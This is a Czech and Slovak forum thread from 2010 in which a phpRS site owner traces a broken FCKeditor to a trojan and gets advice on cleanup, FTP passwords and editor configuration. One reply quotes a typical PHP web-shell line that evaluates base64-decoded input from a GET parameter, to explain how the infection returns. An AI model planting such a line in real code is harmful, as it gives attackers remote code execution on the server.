CKeditor : phpRS Fórum
Máte dotaz ohledně CKeditoru/FCKeditoru pro phpRS?
phpRS - redakční a informační systém
Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-04-13, 19:08

Zdravím, řeším teď problém. Mám 2 weby na 2 různých doménách. Najednou (asi dva dny) se mi ani na jednom nenačte Editor - zůstane tam jen prázdné místo.
Nevíte, co s tím mám dělat? :(

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2010-04-14, 10:39

Skontrolovať súbory, mrknúť do chybovej konzoly JavaScriptu.

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-04-15, 09:00

Ok, dneska jedu domů, tak se na to podívám. Přijde mi divný, že to udělalo naráz na dvou různých webech :(

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2010-04-15, 12:21

Možno hosting

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-04-15, 15:50

Byl to trojan v fckeditorcode_gecko.js . Našlo mi to když jsem se připojil doma na net (nechápu, proč se mi to na tom samém notebooku nedetekovalo už na koleji).
Díky za info :) Jen jsem ten soubor překopčil ze zálohy a je to OK. Lidi už i na webu mi hlásili, že tam je trojan.

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: MirekS (IP adresa zaznamenána)
Datum: 2010-04-15, 16:26

ale prekopirovat originalem nestaci, to se tam za chvili objevi znovu - je treba si odvirovat vlastni pc a zmenit heslo na ftp

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-04-18, 10:49

Hotovo :) Vir u mě nebyl, asi u redaktora.
Chtěl bych se zeptat - v jakém souboru, prosím, je "nastavení jednotlivých tlačítek" - či jak to nazvat?
U tlačítka URL se mi při kliknutí zobrazí jen prázdné okno se záložkama "Informace o odkazu" a "Rozšířené" spolu s tlačítkem "Storno". Jinak je okno prázdné, poté kliknu na "Rozšířené" - kde jsou nekorektní políčka, pak se vrátím na "Informace o odkazu" a už zde mám políčka jak mají být - ovšem tlačítko "OK" se stále nezobrazuje, takže nemohu přidat odkaz.

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-04-18, 22:00

Je to i u obrázku :(

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2010-04-20, 08:56

Ak tam bol vír (skôr vo vidím na útok botnetu), pravdepodobne je tam stále diera, ktorú antivír nenájde ale pomocou ktorej sa nadiaľku ten vírus dostane na hosting. Väčšinou ide o niečo na spôsob :
<?php eval (base64_decode($_GET['p'])); ?>

Tento kód máš niekde v skripte a keď sa zamyslíš nad funkciou, vidíš, že je to krásny backdoor k serveru, ktorý antivír neodhalí.

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-04-20, 15:52

Takže by teoreticky mohlo stačit překopírovat nenakažené soubory z disku ?

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: MirekS (IP adresa zaznamenána)
Datum: 2010-04-20, 16:11

cross182 napsal/a:
-------------------------------------------------------
> Takže by teoreticky mohlo stačit překopírovat
> nenakažené soubory z disku ?


ne, to je jen prvni podminka nikoliv postacujici - a hlavne, musi byt ty soubory opravdu nenakazene (i tak funguji nektere viry, nakazi na lokalnim pc soubory a doufaji, ze je nekdo nekdy nakopiruje na nejaky verejny web, aby pak zacly skutecne skodit)

prvotni infikace se vetsinou deje tim ftp pristupem, takze je treba zmenit heslo pro ftp



Celkem upraveno 1×. Poslední úprava MirekS v 20.04.2010 16:11.

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-05-08, 09:53

Tak je tam vir zpět .. na obou webech ... stáhl jsem na disk složku s editorem, ale na disku antivir nic nenašel ...
Heslo jsem změnil, nakopčil tam nenakažené soubory (nechal jsem si zkontrolovat PC pomocí logů, bylo čisté). Redaktor se tam od té doby podle mě ani nepřihlásil ...
Stačí heslo změnit tak, že na konec přidám např. jen jeden znak? Redaktor ho nemá uložené, řekl jsem mu, ať tam ten znak dycky ručně dopíše.

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-05-08, 12:23

Tak jsem zjistil, kde byl.
Na jednom webu v souboru index.php na rootu + v asi 8 souborech s názvem index.php
Na druhém webu v tom samém + v dalších asi 20 souborech s názvem index.php

Ty soubory se nacházely ve statistikách složky "stats", smazal jsem je. Snad to nějak nevadí .. jestli to jsou ty statistiky z administrace, tak je stejně nevyužívám.

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: pa3k (IP adresa zaznamenána)
Datum: 2010-05-10, 10:53

Zmeň heslo k FTP, nie heslo do administrácie.

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-05-11, 08:52

Vždyť jsem změnil heslo k FTP :)
Jinak mám problém, potřeboval byhc poradit. Překopírovával jsem tam znovu celý editor (na oba weby stejný, stáhl jsem ho kdysi z jednoho mého FTPčka). Teď na jednom webu nejdou vydávat/editovat články - normálně se vše uloží, ale na hl. stránce se nic nezobrazí. Klikl jsem na Preview, a přesměrovalo mě to na hl. stránku druhého webu - ovšem nic se zde nevydalo, jen mě to tam přehodilo.
Takže teď nevím, jak to mám opravit :( Kopíroval jsem tam víc věcí (např. index.php), takže nevím, zda je to tímto editorem. Poradí mi prosím někdo, kde by se takováhle věc mohla konfigurovat?

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-05-12, 08:56

Poradíte prosím?

×××---×××
www.ava-plus44.com
www.blink-182.cz

Re: Editor se nenačte
Zaslán uživatelem/kou: pertinax (IP adresa zaznamenána)
Datum: 2010-05-12, 13:51

ahoj, keby si podrobnejsie opisal co vsetko si menil a co vlastne nefunguje, lebo z toho popisu to nie je celkom jasne,

napr.: nejdou vydávat/editovat články - normálně se vše uloží, ale na hl. stránce se nic nezobrazí ---> clanky sa edituju pomocou aadarticles.php v adresari /admin - daju sa editovat a ulozi sa clanok, alebo nie?

ja by som asi skontroloval ci mam vsetky subory, lebo ak si nieco mazal a kopiroval, mohol si na niektory subor zabudnut (trclanok.php, view.php a pod.) a tiez pozri config.php kde sa nastavuje adresa webu, mozno mas uvedenu rovnaku adresu na oboch weboch ---> $baseadr="http://adresa tvojho webu/"; a preto ta to presmeruje na druhy web

hlavne, ked mam takyto problem ze nieco nejde alebo prestane ist, aj mna niekedy popadne panika, ale potom zacnem racionalne uvazovat co som robil, co som zmenil, vymazal, prekopiroval a podobne

a este

Chtěl bych se zeptat - v jakém souboru, prosím, je "nastavení jednotlivých tlačítek" - či jak to nazvat?

to ako tlacitka editora v administracii clankov rozne pre admina, redaktora atd., ---> tak tie sa nastavuju v subore fckconcig.js v adresari /fckeditor

[http://www.zeleznicne.info]

Re: Editor se nenačte
Zaslán uživatelem/kou: cross182 (IP adresa zaznamenána)
Datum: 2010-05-14, 18:37

Já si právě nepamatuju, co vše jsem překopírovával :(
Ale celá složka s editorem to byla ... u zbytku webu index.php a s dalšími si fakt nejsem jistý :( Jinak config.php je v pořádku.

EDIT: Nechápu jak, ale už to zase jede normálně ...

×××---×××
www.ava-plus44.com
www.blink-182.cz



Celkem upraveno 1×. Poslední úprava cross182 v 14.05.2010 18:45.



Lituji, ale pouze registrovaní uživatelé mohou zasílat příspěvky do této sekce.
This forum powered by Phorum and designed by STaNBoSS.